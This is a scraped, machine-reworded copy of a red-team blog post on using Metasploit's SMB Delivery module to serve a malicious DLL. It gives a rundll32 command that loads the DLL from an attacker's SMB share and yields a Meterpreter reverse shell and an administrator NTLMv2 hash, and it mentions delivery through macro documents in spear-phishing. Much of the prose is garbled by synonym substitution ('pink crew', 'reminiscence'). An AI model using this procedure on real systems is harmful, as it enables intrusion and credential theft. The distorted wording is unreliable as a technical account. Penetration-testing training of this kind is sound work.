Saturday, July 16, 2022
HomeInformation SecurityDLL Injection Over SMB Service. Privilege Escalation & Protection Evasion… | by...

DLL Injection Over SMB Service. Privilege Escalation & Protection Evasion… | by Nairuz Abulhul | R3d Buck3T | Jul, 2022


PRIVILEGE ESCALATION

Privilege Escalation & Protection Evasion — MITRE ATT&CK (T1055)

Metasploit Framework

Dynamic Hyperlink libraries, knowns as DLLs, are blocks of code containing knowledge that present directions on the right way to run packages throughout the Home windows system. If the DLLs are malicious, they’ll execute arbitrary code in reminiscence and carry out numerous nefarious operations.

An attacker can write a malicious DLL that will get injected into reminiscence to raise their privileges or evade detection. They will use this system to realize preliminary community entry or set up persistence.

In a pink crew evaluation, attackers can embed DLLs in Macros inside Microsoft Workplace paperwork and ship them to the goal via a spear-phishing marketing campaign. As soon as a goal opens the doc and clicks on allow the Macro, the DLL payload triggers, and the attacker features a reverse shell that permits them to execute instructions on the compromised machine.

On this publish, we are going to be taught in regards to the Metasploit module SMB Supply that generates malicious DLL payloads and servers them by way of an SMB server.

Within the Kali machine, open up Metasploit with sudo msfconsole, seek for the SMB Supply module, and sort use 0 to pick it.

Metasploit — SMB Delivery Module
Determine 1 — reveals deciding on the SMB Supply module.

Subsequent, sort Choices to point out particulars in regards to the chosen module. The required choices to run the exploit are the goal IP tackle (SRVHOST) and port quantity 445 (SRVPORT). The payload may be reverse_https or reverse_tcp; in this demo, I used reverse_tcp.

💡One factor to notice is that I had hassle setting the IP tackle of the SRVHOST with this module. Each time I ran the exploit with a specified IP tackle, I might get BindFail errors“[-] Exploit failed [bad-config]: Rex::BindFailed The tackle is already in use or unavailable.”

[-] Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable
Determine 2 — reveals the generated BindFail error when the SRVHOST IP was set.

After researching and digging into older feedback in GitHub for Metasploit bind errors, I discovered that this module is buggy on the Metasploit framework model v6.2.4-dev. The one answer that labored for me was operating the exploit with out setting the SRVHOST IP tackle (0.0.0.0)and later changing it with the listener IP tackle.

Determine 3— reveals the module particulars with out setting the SRVHOST IP

For the payload data, guarantee you may have the right listener tackle, your attacking machine IP tackle, and any port quantity that’s not in use. As soon as all the pieces is prepared, sort run or exploit to run the module.

SMB Delivery — generating malicious DLL
Determine 4 — reveals the generated DLL file after operating the module

When the payload is generated rundll32.exe .0.0.0tASoqtest.dll,0 , change 0.0.0.0 with the attacker IP tackle— rundll32.exe 192.168.233.147tASoqtest.dll,0 .

The generated payload makes use of the Rundll32.exe utility, which permits launching the functionalities saved within the shared .dll file and storing them in reminiscence.

rundll32.exe
Determine 5- reveals the modified payload with the goal IP tackle.

The next step is to execute the payload on the goal machine; you’ll be able to run in file explorer or PowerShell/CMD immediate.

💡 This publish solely reveals the right way to generate DLL information with the SMB Supply module ; in future posts, we are going to talk about the right way to ship these payloads in a real-world eventualities.

Determine 6- reveals executing the payload within the goal server utilizing file explorer.

When the payload is executed efficiently, a Meterpreter shell opens and reveals the captured NTLMv2hash of the compromised consumer. On this case, it was the administrator hash.

That’s all for this publish; thanks for stopping by!!

RELATED ARTICLES

LEAVE A REPLY

Please enter your comment!
Please enter your name here

- Advertisment -
Google search engine

Most Popular

Recent Comments